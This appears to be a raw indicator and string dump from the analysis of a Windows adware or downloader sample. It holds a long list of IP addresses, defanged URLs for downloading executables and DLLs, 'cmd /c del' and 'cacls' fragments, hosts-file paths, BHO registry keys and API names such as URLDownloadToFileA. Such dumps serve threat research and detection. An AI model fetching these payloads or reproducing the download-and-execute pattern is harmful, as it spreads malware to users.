61.163.74.214

171.8.149.30

219.156.158.153

123.13.226.77

123.15.45.59

125.46.14.238

218.28.115.226

123.7.63.24

218.28.112.130

61.54.5.202

219.156.138.129

125.46.97.59

123.7.84.147

61.163.123.55

222.88.240.84

123.7.110.159

61.158.175.99

222.89.155.110

61.53.68.34

218.28.61.78

61.136.80.21

123.149.254.70

202.110.75.26

125.40.237.173

125.46.1.54

123.55.118.50

218.28.224.98

218.28.108.201

218.29.155.254

202.110.75.118

123.15.32.230

218.28.50.138

61.163.32.4

125.46.0.46

218.29.96.162

221.13.156.162

218.28.185.108

123.7.178.234

219.150.248.82

125.46.5.162

218.29.87.202

61.163.38.17

61.136.82.251

123.15.55.250

222.88.82.83

61.54.5.120

218.28.219.118

202.110.75.234

123.7.180.44

125.40.237.190

123.7.87.84

61.163.108.178

218.28.56.150

202.110.73.172

221.14.18.193

61.163.37.25

222.89.46.178

218.29.222.35

1.192.144.156

218.28.237.142

202.110.67.71

61.163.163.236

125.46.5.218

222.88.212.250

123.13.223.16

61.163.32.34

61.163.33.107

61.136.115.131

61.53.137.141

125.46.5.110

61.158.175.58

61.158.171.6

61.163.35.9

222.88.114.81

123.7.14.122

218.28.213.154

218.28.91.20

219.157.73.230

222.89.10.116

218.28.170.122

202.110.67.7

125.46.14.78

202.110.84.42

125.46.53.244

218.28.101.166

61.136.71.62

222.85.38.112

61.54.225.28

218.28.188.114

222.138.67.15

61.54.3.130

125.46.77.82

61.163.180.71

123.7.18.64

123.15.37.142

61.54.227.75

61.163.38.47

218.28.87.182

115.56.226.202

125.46.111.142

125.46.6.74

202.110.72.179

222.139.212.225

202.110.73.170

61.163.162.27

123.161.207.10

218.29.122.202

123.15.52.18

218.28.67.202

61.136.82.58

218.29.8.6

222.89.46.39

218.28.125.246

222.88.212.34

61.163.164.107

61.163.7.196

222.140.93.114

202.110.93.238

218.28.124.67

123.7.51.132

123.7.113.48

222.88.150.18

222.89.155.29

218.29.69.66

222.88.66.130

218.29.234.114

222.138.66.77

123.7.182.57

61.163.92.162

219.150.255.11

222.89.157.146

218.29.97.38

218.29.55.10

218.28.153.30

221.13.153.30

218.28.22.227

61.163.38.43

222.88.208.38

218.28.54.90

219.150.132.68

218.29.220.178

218.28.49.84

125.46.81.250

221.13.152.106

61.163.32.41

218.28.5.210

61.163.163.138

123.162.220.148

123.7.18.99

222.89.130.158

218.28.17.90

218.28.68.158

182.123.224.10

218.29.4.116

218.28.142.228

218.28.143.2

123.7.38.16

61.54.242.79

222.89.39.122

218.28.96.54

202.110.72.181

202.110.72.109

61.53.64.226

218.28.124.198

222.88.212.146

61.158.175.7

222.88.190.51

61.163.58.96

123.7.63.189

61.54.245.10

61.158.169.92

218.29.131.154

222.88.149.52

222.88.154.40

123.7.54.92

218.28.216.30

61.163.94.210

125.46.12.218

218.28.170.252

123.7.180.35

218.28.59.78

218.28.237.250

221.13.153.114

222.89.152.138

1.192.146.5

218.29.227.58

123.7.52.162

171.8.149.47

123.7.82.86

218.28.67.58

218.28.54.66

123.7.118.135

222.89.133.107

123.7.51.108

125.46.33.130

123.7.183.51

218.28.210.50

125.46.7.14

218.28.91.10

61.163.38.51

123.7.114.138

125.46.95.229

61.163.164.89

61.136.64.26

218.28.88.214

221.13.207.154

222.141.17.7

171.15.132.8

202.110.72.142

125.40.199.207

222.89.157.147

61.163.212.2

123.7.182.97

221.13.156.194

222.89.155.248

61.163.27.6

222.85.37.249

123.7.87.102

202.110.67.12

123.54.153.67

222.88.78.150

218.29.94.178

222.139.221.84

222.89.152.114

218.29.8.13

123.7.51.44

171.8.66.112

61.54.226.242

182.116.57.116

221.13.128.115

218.28.31.205

42.228.6.158

123.7.51.204

219.156.168.39

123.7.180.32

123.7.83.83

61.163.38.129

123.54.71.154

61.54.227.12

219.156.157.179

218.29.55.176

222.138.67.3

218.28.56.214

123.7.18.87

123.7.81.233

61.163.235.68

61.163.32.70

123.149.21.54

222.88.209.170

61.54.4.22

218.28.165.138

125.46.0.114

202.110.75.174

218.28.58.234

218.29.230.162

61.163.105.86

125.46.29.42

123.7.181.16

125.46.0.126

222.138.178.240

218.28.237.198

61.163.38.40

218.28.103.114

218.28.71.182

202.110.75.130

222.88.240.141

221.13.156.118

61.136.81.139

219.150.139.250

125.40.191.187

61.163.162.83

222.141.68.69

125.46.71.14

123.7.83.241

222.88.219.62

123.7.53.6

218.28.53.74

219.150.127.2

123.7.114.247

61.136.99.90

222.88.249.55

222.138.67.20

222.89.159.188

219.156.138.43

218.29.48.13

219.156.168.9

218.28.35.178

61.163.163.144

61.54.225.19

61.54.225.5

125.46.12.130

171.11.39.29

61.163.180.76

61.54.6.50

218.28.62.62

123.7.63.102

222.89.247.7

218.28.9.18

123.7.51.219

123.7.54.172

61.163.163.34

218.28.115.90

218.29.225.98

222.88.2.18

218.28.8.50

222.88.208.37

61.163.124.91

202.110.74.162

218.28.58.114

202.110.67.227

61.54.5.146

218.29.37.15

218.28.117.182

218.28.239.90

219.156.138.25

218.28.172.222

61.54.243.176

123.7.85.164

123.7.87.81

218.29.48.22

222.88.151.243

222.89.156.60

222.89.133.116

202.110.84.90

61.158.156.4

123.7.118.112

218.28.244.6

222.88.78.4

222.139.221.250

42.225.51.89

61.158.175.114

123.15.63.60

222.88.222.170

61.136.71.94

218.29.7.117

218.28.90.195

218.28.4.13

218.29.48.4

61.163.182.67

202.110.72.42

218.29.48.3

222.89.1.242

218.28.31.212

218.28.89.10

218.29.217.194

218.29.39.91

202.110.81.70

221.13.152.18

123.7.117.157

218.28.125.158

123.13.235.17

61.53.65.38

218.28.210.49

61.163.224.106

218.29.89.114

222.139.6.225

218.28.3.2

222.89.157.253

125.46.14.202

218.28.67.246

218.29.63.230

218.28.78.71

61.54.227.187

218.28.80.150

125.46.91.230

222.89.2.26

123.7.83.147

218.29.218.130

123.15.39.34

123.7.181.205

222.88.64.50

125.46.43.230

202.110.73.219

61.54.225.181

123.55.227.202

218.29.5.178

61.54.226.157

123.15.55.178

125.46.25.146

222.89.159.35

222.88.92.3

61.136.99.34

123.13.206.211

218.28.5.254

61.54.14.24

123.7.114.11

218.29.194.102

219.150.155.106

123.7.14.132

61.136.115.187

202.110.74.170

221.13.156.150

123.7.62.183

125.46.16.91

218.28.112.182

218.29.6.233

218.28.58.178

123.7.14.105

171.9.112.205

222.88.155.54

202.110.67.24

222.89.1.175

218.28.71.187

222.89.11.111

61.163.37.145

61.136.115.249

61.54.14.69

222.85.68.186

61.163.33.59

123.7.83.206

202.110.67.16

1.195.129.10

61.163.180.66

222.141.66.209

222.139.6.205

123.7.55.167

218.29.169.38

115.56.226.6

222.138.65.81

222.139.221.170

219.154.38.34

171.15.254.146

218.29.238.22

61.54.245.112

221.15.44.84

218.28.88.243

61.163.33.55

61.163.26.210

171.15.254.80

182.123.224.13

171.15.254.82

61.163.38.101

61.54.14.108

61.54.3.59

61.163.37.2

61.163.124.84

115.56.225.166

61.163.82.42

218.28.53.78

218.28.182.186

222.138.67.39

222.89.247.28

61.54.13.73

218.28.142.234

61.158.155.70

202.110.74.186

218.28.22.218

222.88.212.66

61.163.24.246

218.29.88.62

61.163.164.56

222.89.11.140

222.88.219.46

218.28.88.58

125.46.2.134

218.28.138.74

123.163.198.243

218.28.53.242

123.7.113.46

218.28.86.237

218.28.56.58

218.28.55.8

61.53.64.30

218.28.52.70

61.54.225.20

222.139.215.115

61.163.163.29

61.54.213.44

221.13.228.6

61.158.172.181

218.28.190.45

218.29.48.2

218.28.87.139

123.7.82.19

218.28.244.222

222.138.69.165

202.110.85.90

123.7.113.26

218.28.100.182

61.163.94.226

125.46.4.169

61.136.115.133

218.28.111.246

123.55.118.49

222.88.151.52

218.28.55.86

218.28.56.114

125.46.89.244

218.28.94.92

219.154.75.60

222.141.17.18

222.88.149.40

1.192.156.137

218.28.57.151

221.13.130.142

123.7.88.198

219.150.211.130

61.163.7.245

202.110.72.178

61.158.172.234

61.163.38.9

61.158.187.191

202.110.75.238

218.28.56.90

218.28.235.154

218.29.37.248

123.15.49.242

222.88.79.242

218.28.54.170

218.29.37.137

218.27.207.220

218.28.56.66

123.7.182.77

218.28.80.102

218.28.219.46

222.88.119.37

61.163.38.69

222.138.120.98

222.89.155.107

218.29.230.30

221.15.38.15

61.136.115.92

61.158.175.95

222.139.245.73

218.29.6.180

61.163.194.19

218.28.215.110

61.163.103.110

123.101.174.94

222.88.190.182

125.40.237.106

125.46.2.114

222.88.114.49

219.156.138.45

123.13.205.221

123.7.51.14

123.7.52.67

218.28.191.122

202.110.67.232

218.28.75.222

218.28.56.74

218.28.111.22

123.7.81.167

125.46.5.170

222.141.197.14

218.29.12.149

123.15.46.78

219.154.38.42

218.29.8.7

61.53.65.51

222.89.240.8

61.163.38.38

61.163.163.151

218.28.216.206

61.54.4.21

218.28.201.170

125.46.1.118

222.88.251.6

222.89.156.42

202.110.75.70

115.56.227.250

218.29.224.102

222.89.248.197

61.54.6.184

61.163.38.79

123.7.113.7

218.28.87.142

123.52.127.95

125.46.12.94

61.163.16.202

61.158.175.63

61.163.164.75

222.88.186.158

61.163.33.10

123.7.88.111

61.158.175.130

222.89.247.137

222.89.131.39

218.29.12.193

125.46.14.250

123.7.78.220

123.13.203.35

221.15.32.4

218.29.4.1

123.7.63.106

219.154.133.4

222.139.7.108

61.163.165.150

61.163.38.13

124.240.185.67

222.139.5.214

202.110.73.186

222.89.8.221

171.8.149.90

218.28.51.238

222.88.67.231

219.156.157.12

218.28.2.82

115.56.226.86

222.88.194.59

123.7.118.159

123.15.46.98

123.7.51.22

218.28.125.30

125.46.24.186

218.28.224.146

61.54.227.3

218.29.12.93

123.52.235.41

218.28.87.185

202.110.72.133

123.7.87.28

222.138.67.5

218.29.238.26

61.163.164.105

125.46.4.165

218.29.38.60

61.54.3.81

218.28.65.206

123.7.51.113

202.110.85.110

222.88.42.6

218.28.49.94

202.110.83.58

202.110.73.226

125.46.12.98

218.29.238.62

218.28.65.25

123.7.85.167

61.54.227.10

61.158.175.106

218.29.234.30

123.7.88.71

218.29.234.106

61.163.38.8

219.150.121.240

61.136.115.146

123.7.14.107

202.110.85.198

123.7.51.80

218.28.32.3

61.54.4.34

125.45.239.252

125.46.14.226

222.139.212.67

202.110.73.238

222.139.245.87

218.29.225.10

222.138.67.81

218.29.7.182

125.40.191.141

222.88.151.10

61.163.164.86

222.89.208.202

218.28.58.226

61.158.171.7

218.29.5.69

61.158.173.140

219.156.151.2

61.136.115.194

123.7.85.172

61.136.115.156

218.29.200.200

202.110.72.202

61.136.115.141

222.88.151.11

202.110.72.212

202.110.73.166

222.89.155.108

123.7.83.240

218.28.75.106

125.40.237.6

202.110.72.210

218.29.56.135

218.29.6.228

61.136.64.46

202.110.72.184

125.40.237.213

123.13.201.99

61.163.164.118

125.45.239.201

115.56.230.194

218.28.236.146

125.40.199.113

222.139.10.43

61.163.164.4

123.54.153.42

1.196.127.33

61.163.164.207

61.163.180.65

218.28.143.173

219.150.248.70

221.13.136.105

218.29.37.154

123.15.43.188

202.110.67.70

123.7.88.83

61.136.80.90

61.163.32.5

202.110.85.94

61.163.32.7

123.7.87.215

218.28.74.222

115.56.224.194

221.13.128.94

202.110.72.180

61.163.164.87

222.88.219.181

218.29.38.61

61.163.25.250

219.156.168.52

125.46.0.134

218.28.92.118

125.46.46.102

61.163.164.100

218.28.55.12

222.89.218.194

222.89.155.104

218.29.37.120

125.46.3.14

218.28.110.170

218.28.23.35

222.85.23.102

218.28.244.106

222.88.149.13

222.139.245.204

61.53.66.32

218.29.209.190

61.163.32.28

61.163.162.242

125.46.4.166

202.110.84.54

218.29.37.100

61.136.115.132

218.29.5.243

61.158.175.136

125.46.93.130

202.110.84.118

218.28.159.218

61.163.7.234

218.29.12.155

218.28.117.22

123.7.56.176

218.28.68.186

218.28.112.150

123.7.80.105

61.163.32.14

218.28.191.62

61.163.236.165

61.136.64.106

61.158.168.239

61.136.115.138

61.53.64.3

61.163.33.39

61.136.115.162

218.28.182.134

123.7.81.180

218.29.48.15

218.28.68.198

125.42.4.232

222.88.64.74

218.28.55.13

61.163.236.119

218.28.124.253

123.7.52.253

218.29.230.90

222.88.253.228

222.88.155.101

218.29.225.106

61.54.6.47

61.163.37.13

222.88.208.42

123.7.83.205

219.150.248.14

125.46.29.2

202.110.75.226

61.53.64.207

202.110.84.70

123.7.85.161

61.163.32.55

222.138.69.163

123.7.51.5

218.29.48.5

171.15.254.163

61.54.225.184

61.136.93.38

222.88.106.5

123.7.14.84

61.53.181.5

218.29.5.84

1.195.129.22

123.7.118.166

218.29.240.222

61.136.108.210

115.56.225.130

218.28.237.154

218.29.4.165

218.28.213.42

222.89.253.167

218.29.38.219

61.163.32.56

123.7.113.45

125.46.56.154

219.150.181.147

123.7.88.195

123.7.88.65

218.28.89.179

123.13.223.22

222.138.65.50

222.88.117.210

222.139.6.209

222.88.155.78

202.110.84.82

218.28.58.194

218.29.55.212

61.163.164.227

222.88.209.22

218.28.109.20

61.158.169.70

61.53.137.12

222.88.149.79

222.88.199.139

61.163.38.58

61.54.225.169

218.29.4.219

123.7.63.212

61.158.168.242

125.46.4.229

171.8.66.245

1.196.157.7

61.163.236.78

218.28.174.166

218.28.88.113

219.154.45.235

219.156.157.81

61.163.127.6

61.163.180.62

123.7.88.2

222.89.55.45

218.28.75.102

61.158.169.170

61.53.134.59

123.7.113.16

218.29.230.86

222.139.6.204

222.141.68.93

61.163.162.252

218.29.37.42

123.13.224.236

61.163.164.19

218.28.9.58

218.28.88.220

123.13.235.89

61.163.2.134

125.45.239.151

218.28.89.180

61.53.65.164

218.28.172.210

61.163.163.171

61.53.65.3

222.88.240.241

218.29.39.53

61.158.181.8

218.28.210.59

61.158.175.85

202.110.93.66

222.89.252.68

218.28.65.42

222.88.151.89

222.89.156.109

61.54.5.251

125.40.175.250

123.7.14.144

182.123.224.98

61.54.213.59

222.89.247.14

218.29.5.172

123.52.132.10

222.88.154.61

61.163.4.49

218.28.7.214

218.28.89.134

218.28.88.249

218.28.218.92

123.52.132.203

115.56.230.226

61.54.6.16

123.13.224.209

222.88.83.210

222.88.150.102

222.89.120.158

61.54.225.61

218.29.240.34

123.15.55.202

221.15.44.8

218.29.37.225

218.28.245.138

218.29.240.218

61.54.13.40

61.163.164.28

222.89.11.102

61.163.32.60

222.88.242.180

125.46.12.58

42.239.4.13

202.110.67.3

221.13.242.46

218.28.190.124

218.28.236.12

61.136.78.241

219.154.156.165

123.7.88.221

218.29.214.66

219.156.157.167

123.7.81.220

61.163.33.23

221.15.44.43

218.29.55.129

218.29.23.134

61.136.115.91

218.29.240.18

222.88.149.24

219.156.157.88

218.28.212.5

218.29.8.5

61.163.180.68

125.46.14.138

218.28.65.45

61.136.99.94

218.28.75.90

61.136.115.231

123.7.53.94

61.163.27.254

61.136.64.134

218.29.7.219

125.46.44.210

123.7.118.144

61.163.164.41

202.110.72.59

202.110.72.56

61.163.124.80

222.89.39.94

42.228.8.178

61.168.166.12

125.46.76.86

222.141.68.77

222.139.245.76

61.158.175.9

222.88.154.180

218.29.37.132

123.7.14.139

61.158.172.20

222.88.155.17

61.163.236.124

218.28.103.206

123.7.82.36

218.28.87.157

218.29.238.6

61.163.236.253

218.28.106.206

61.158.175.162

218.28.12.44

123.13.201.47

218.29.23.133

218.29.48.17

218.28.143.82

42.229.143.197

222.89.218.74

123.7.178.34

218.28.57.206

222.138.67.4

222.89.218.68

221.13.140.112

61.136.81.186

125.46.4.116

222.89.157.211

202.110.93.30

1.199.59.15

218.29.225.254

218.28.57.38

61.163.37.10

218.28.180.250

1.194.185.214

123.7.39.236

218.28.90.108

61.163.180.56

61.136.64.214

1.197.15.172

218.28.25.242

222.139.245.242

202.110.73.148

222.138.2.44

218.28.101.22

222.89.229.91

202.110.75.98

123.7.180.6

218.28.20.46

222.88.251.23

61.163.37.21

218.28.65.126

218.28.182.238

218.28.245.118

123.15.37.186

219.150.117.107

61.54.225.136

61.136.65.110

222.89.11.42

123.15.51.162

61.136.65.74

222.139.221.172

61.163.36.18

221.14.150.37

61.136.65.62

61.136.65.54

61.136.115.188

222.88.116.25

61.136.65.126

218.28.74.202

218.28.106.202

61.163.179.100

202.110.73.134

222.89.219.8

218.28.25.174

123.7.51.83

125.46.94.70

61.163.37.27

218.29.98.190

61.136.65.50

218.28.85.118

218.28.51.228

61.163.36.30

61.136.65.78

218.28.224.82

222.89.229.58

171.15.254.156

218.28.216.50

218.29.234.66

222.139.245.86

125.46.48.226

61.163.36.10

218.28.53.219

61.163.219.150

202.110.72.21

125.46.97.58

222.85.0.166

123.7.86.37

61.163.224.198

218.28.245.238

61.136.65.86

171.15.254.140

61.54.227.42

218.29.4.89

61.163.36.65

202.110.73.211

123.7.56.25

218.29.98.166

222.88.208.200

61.136.65.146

219.150.120.221

61.54.227.9

218.28.188.122

222.88.219.102

219.147.48.5

123.7.55.103

218.28.178.138

123.7.81.234

123.7.142.134

218.28.96.113

61.136.99.38

61.163.38.64

61.136.65.94

218.28.86.214

61.163.33.125

61.163.37.122

61.163.36.63

123.13.179.81

218.29.239.206

218.29.234.98

222.89.160.180

61.163.36.82

219.156.151.22

218.29.6.82

125.40.181.144

61.136.79.218

202.110.75.2

218.28.178.134

202.110.73.171

61.136.65.66

218.29.37.136

222.89.39.91

123.7.63.45

218.29.134.146

61.54.6.57

61.136.99.66

218.29.216.98

61.163.36.26

218.29.63.34

218.29.37.194

125.46.4.162

61.54.227.2

222.141.69.2

218.29.8.12

61.136.115.157

123.7.81.236

61.136.108.46

218.28.103.142

61.53.134.140

202.110.72.159

222.89.156.101

218.28.78.132

61.163.77.186

219.157.72.6

123.7.113.36

61.163.36.44

218.28.67.2

202.110.93.242

218.29.8.2

218.29.37.170

61.163.164.78

61.136.115.171

123.52.136.212

61.136.115.140

61.136.65.38

218.28.124.146

61.163.164.74

222.85.68.110

218.29.6.77

123.15.37.122

202.110.85.78

123.101.143.19

218.28.218.65

222.89.133.124

218.28.57.14

202.110.72.182

218.28.91.11

123.7.14.141

218.29.233.202

218.29.62.170

202.110.73.124

218.29.5.61

61.163.164.77

61.54.13.234

202.110.85.54

218.28.75.122

219.154.133.71

219.156.151.20

125.45.158.20

123.13.204.230

61.136.108.102

218.28.30.235

171.8.252.51

218.28.58.150

218.28.245.230

61.163.32.73

219.156.158.110

218.28.51.242

218.28.218.61

219.150.205.104

218.29.233.18

123.7.53.244

222.89.7.87

219.156.138.119

61.136.71.162

218.28.49.126

123.7.183.160

219.150.127.47

202.110.73.6

218.29.37.38

61.163.37.19

222.89.155.119

125.45.237.121

61.136.71.34

61.163.37.75

218.28.135.90

202.111.140.52

222.85.52.12

123.7.116.98

218.29.14.135

61.163.27.110

218.29.37.143

61.163.32.18

123.7.85.238

219.156.151.18

218.28.50.246

202.110.72.164

123.54.152.130

218.28.50.130

61.136.65.170

218.29.232.162

61.163.164.130

218.29.56.28

1.192.147.173

221.15.44.52

61.163.36.45

218.28.169.122

219.154.156.161

61.163.37.26

222.88.195.72

123.13.237.16

218.28.58.98

219.150.227.4

218.28.238.243

218.28.56.106

61.163.32.37

218.29.37.79

218.28.50.202

61.158.171.60

123.7.82.21

61.163.32.76

61.158.169.58

123.53.198.244

218.28.85.58

222.89.160.138

125.46.6.198

61.136.64.90

202.110.67.74

123.7.53.156

202.110.81.170

61.158.175.57

218.29.55.213

123.7.183.20

61.54.6.202

61.54.6.238

222.88.71.80

125.46.95.246

61.163.36.56

123.53.85.17

218.28.50.38

123.7.88.244

123.7.87.88

222.85.35.11

202.110.85.114

218.29.230.14

218.28.122.46

218.28.224.162

222.88.71.130

222.89.1.183

222.89.218.39

123.54.153.63

219.154.45.66

218.28.180.30

218.28.65.88

125.46.97.42

218.29.5.137

222.139.212.226

218.29.235.22

222.88.153.85

219.157.127.18

218.28.100.230

202.110.73.147

218.28.117.62

222.89.243.106

115.55.77.215

61.163.33.115

61.163.116.186

61.54.246.227

61.54.225.199

218.28.21.75

218.28.71.78

61.54.246.243

222.139.5.81

218.29.38.20

218.29.5.57

182.126.240.8

219.154.46.2

61.136.115.166

219.156.168.50

123.13.204.140

123.13.206.24

219.150.227.19

219.150.205.18

222.88.195.76

125.46.14.164

218.28.50.142

218.28.8.194

171.8.66.16

218.29.55.124

218.29.214.78

115.56.230.218

125.46.76.188

123.7.178.215

219.154.46.102

123.101.224.185

123.52.127.16

61.163.164.45

222.139.5.137

221.13.152.214

218.28.216.146

115.56.225.194

222.139.6.88

@.reloc

w.toQb^

D:\drivers\

hXXp://user.yswm.net/yswm/

hXXp://user.yswm.net/so118/

noweb

\win.ini

\lkfdf\WmiPreSe.exe

cmd /c start

\073.exe

\sys.dll

cmd /c del /s

user.yswm.net

%System%\drivers\etc\Hosts

%System%\drivers\etc\Hosts.txt

\iesafe.dll

\E-yoo\EyooSechelper2.dll

cmd /c cacls

%Documents and Settings%\%current user%inistrator\

8.8.8.8

hXXp://yxtt.v138.net/send/jwclose/kill.txt

hXXp://VVV.v138.net/ycdel.asp?action=ser&username=

wb2014.oicp.net

hXXp://VVV.yswm.net/ycdel.asp?action=ser&username=wenhua-

liuyingkyu.eicp.net

~DFA1039.tmp

[email protected]

hXXp://yxtt.v138.net/send/jwclose/app.txt

hXXp://down.v718.com/073.exe

hXXp://down.v718.com/svchost.exe

\xcfde.exe

hXXp://down.v718.com/666.exe

hXXp://yxtt.v138.net/send/jwclose/qqtang.txt

hXXp://down06.gdicoou.com:5505/updata/adclient/client/2921ico.exe

hXXp://down.v718.com/qqtang.exe

\1599.exe

\1671.exe

hXXp://down.v718.com/1671.exe

\1150.exe

\1600.exe

\1672.exe

\1655.exe

\szicoad.exe

hXXp://down06.gdicoou.com:5505/updata/adclient/client/2920ico.exe

hXXp://down.v718.com/apphftts.exe

hXXp://down.v718.com/appinst.exe

hXXp://down.v718.com/niulock.exe

flash.exe

hXXp://down.v718.com/remove.exe

hXXp://down.v718.com/hook.dll

\system32\browse1c.dllbak

\system32\browse1c.dll

hXXp://mactj.v138.net/mactj.asp?mac=

223.244.230.186

hXXp://yxtt.v138.net/send/jwclose/yswm.txt

hXXp://down.v718.com/addjc.dll

ystb.Favorites

conime.exe

hXXp://VVV.topyouxi.net/newcor.dll

hXXp://down.v718.com/exitpop.dll

yswm.gamepop

hXXp://down.v718.com/ico.dll

yswm.ico

lockie.ini

JianGuanUrl

webfile

\system\lock.dat

\system32\gdi30.dll

\system32\lockie.ini

hXXp://down.v718.com/lock.dll

hXXp://down.v718.com/lock.exe

hXXp://down.v718.com/lock2.exe

yszy.lockie

config.ini

hXXp://down.v718.com/hbxzctp.exe

hXXp://down.v718.com/sgtp.exe

hXXp://down.v718.com/sgtp2.exe

hXXp://VVV.yswm.net/ip.asp

hXXp://iframe.ip138.com/ic.asp

The specified file is either a named or anonymous pipe

Cookies\*.*

ids.exe

-url:http:

minie.exe

anhui-000001.exe

netbar.exe

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

1.vbp

yswm.runsoft

yswm.exe

%original file name%.exe_516_rwx_02561000_0005E000:

8%u(j

j.Yf;

_tcPVj@

.PjRW

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

%d * %d

hXXp://yxtt.v138.net/send/yxjtc/yxjtz.htm

hXXp://yxtt.v138.net/send/yxjtc/yxjup.htm

IWebBrowser2

IWebBrowser2

RegCreateKeyTransactedW

RegOpenKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyExW

\svn\InsertWnd\Release\InsertWnd.pdb

zcÁ

c:\%original file name%.exe

GetCPInfo

GetProcessHeap

RegCreateKeyExW

RegOpenKeyExW

RegEnumKeyExW

RegQueryInfoKeyW

RegCloseKey

RegDeleteKeyW

URLDownloadToFileW

EnumChildWindows

EnumWindows

DeleteUrlCacheEntryW

  64l.Qp

.text

`.rdata

@.data

.rsrc

@.reloc

combase.dll

kernel32.dll

mscoree.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

USER32.DLL

portuguese-brazilian

hXXp://yxtt.v138.net/send/InsertWnd.txt

hXXp://yxtt.v138.net/send/yxjk/jzyxj.txt

hXXp://yxtt.v138.net/send/InsertWnd_2345title_en.dll

InsertWnd_2345title_en LoadLibrary DLLResLib.dll

E:\projects\InsertWnd\%s\Debug\Demo.exe

E:\projects\InsertWnd\%s\Release\Demo.exe

20151231

insert.txt

insert.tmp

id:%s

shell.Explorer.2

CreateInteriorIE %X %s

%s Navigate() -> m_pWeb

%s Navigate() -> m_axWnd.m_hWnd

Content-Type: application/x-www-form-urlencoded

%X %s m_pWeb->Navigate %s

HKEY_CLASSES_ROOT

HKEY_CURRENT_USER

HKEY_LOCAL_MACHINE

HKEY_USERS

HKEY_PERFORMANCE_DATA

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

WAdvapi32.dll

[M/d/d d:d:d.d]

chrome

firefox

%X %s

%original file name%.exe_516_rwx_02631000_0004D000:

uDPPPh

j.Yf;

_tcPVj@

.PjRW

61.132.227.24

IP:61.132.227.24,

&8.8.8.8^

hXXp://

iexplore.exe

)^swclickmsg^icoJC*

\~IcsaVas32.tmp

hXXp://yxtt.yswm.net/send/ico2safe.txt

\~IcVas32.tmp

hXXp://yxtt.v138.net/send/dzjck/hzico.txt

hXXp://yxtt.yswm.net/send/ico2.txt

C:\Windows\Media

%Program Files%

\xsend.tmp

%Y-%m-%d %H:%M:%S

%Y%m%d%H

\system\~DF3812.TMP

hXXp://zmtb.yswm.net/Send.asp?id=

\~icabc.dfa

\~coicdk.tmp

hXXp://zmtb.yswm.net/xadf/config.txt

hXXp://zmtb.yswm.net/jx/config.txt

hXXp://zmtb.yswm.net/config.txt

hXXp://down.v718.com/ysIco/config.txt

hXXp://yxtt.v138.net/send/ico/hnico.txt

hXXp://yxtt.v138.net/send/ico/lhmico.txt

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

GetProcessWindowStation

operator

E:\work\fpProject\

\src\IcoJc\Release\IcoJc.pdb

%WinDir%

zcÁ

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\xsend.tmp

c:\%original file name%.exe

[{000214A0-0000-0000-C000-000000000046}]

URL=hXXp://VVV.apyw.net/sy2/

HotKey=0

.rsrc

Y}nnÌHYC

OUU%x

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

KERNEL32.DLL

GetProcessHeap

WinExec

GetCPInfo

ShellExecuteA

InternetOpenUrlA

.text

`.rdata

@.data

@.reloc

ex.ab

kernel32.dll

- CRT not initialized

- Attempt to initialize the CRT more than once.

- floating point support not loaded

mscoree.dll

USER32.DLL

portuguese-brazilian

%original file name%.exe_516_rwx_02691000_00063000:

operator

GetProcessWindowStation

E:\projects\DLLResLib\Release\DLLResLib.pdb

zcÁ

c:\%original file name%.exe

11032135

110430-90

2010-2011

2011-2012

20110217

20110225

2012-2013

83319111

20130901

EXOsShowTime

EXOsShowTime2013

SSHOWTIME

GagConcert

-2011114

-20111121

-20111123

-20111128

-2011115

VividRedOperation

WeBareBears

2013-2014

MissHOKUSAI

primopasso

secondpasso

-XTREMEXECUTOR

TheConcert

2014-2015

GetProcessHeap

GetCPInfo

.text

`.rdata

@.data

.rsrc

@.reloc

mscoree.dll

kernel32.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

USER32.DLL

%original file name%.exe_516_rwx_11001000_0002E000:

vb6chs.dll

MSWINSCK.OCX

MSWinsockLib.Winsock

AccUDP

%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB

%System%\msvbvm60.dll\3

urlmon

URLDownloadToFileA

DownUrl

VBA6.DLL

epldrive.dll

mksparse.dll

DiskVolume.dll

oleaut32.dll

shell32.dll

winmm.dll

X%System%\MSWINSCK.oca

advapi32.dll

ws2_32.dll

wsock32.dll

LocalPort

RemotePort

WSOCK32.DLL

USER32.DLL

127.0.0.1

BakUrl

uMsg

lngPort

.text

`.data

.rsrc

@.reloc

kEyH

9/}Cmd

2c49f800-c2dd-11cf-9ad6-0080c7e7b78d

\SoftP2P

2\P2P.vbp

hXXp://download.cpudln.com/8/ad15712.exe

c:\3.exe

hXXp://117.79.80.169/ad15712.exe

\~DFA90A3.TMP

255.255.255.255

The specified file is either a named or anonymous pipe

c:\windows\lock.log

Windows Sockets version

is not supported by winsock.dll

supported sockets.

SendUDP

Get Url:

123111123123

CSocketMaster.RemotePort

Invalid operation at current state

The argument passed to a function was not in the correct format or in the specified range.

CSocketMaster.RemoteHost

CSocketMaster.LocalPort

CSocketMaster.Protocol

CSocketMaster.DestroySocket

CSocketMaster.SocketExists

CSocketMaster.Connect

Unsupported variant type.

CSocketMaster.PostSocket

CSocketMaster.ConnectToIP

CSocketMaster.Bind

CSocketMaster.BindInternal

PORT:

CSocketMaster.SendData

CSocketMaster.GetLocalHostName

CSocketMaster.GetLocalIP

CSocketMaster.ResolveIfHostname

CSocketMaster.SendBufferedDataUDP

CSocketMaster.SendBufferedData

CSocketMaster.RecvDataToBuffer

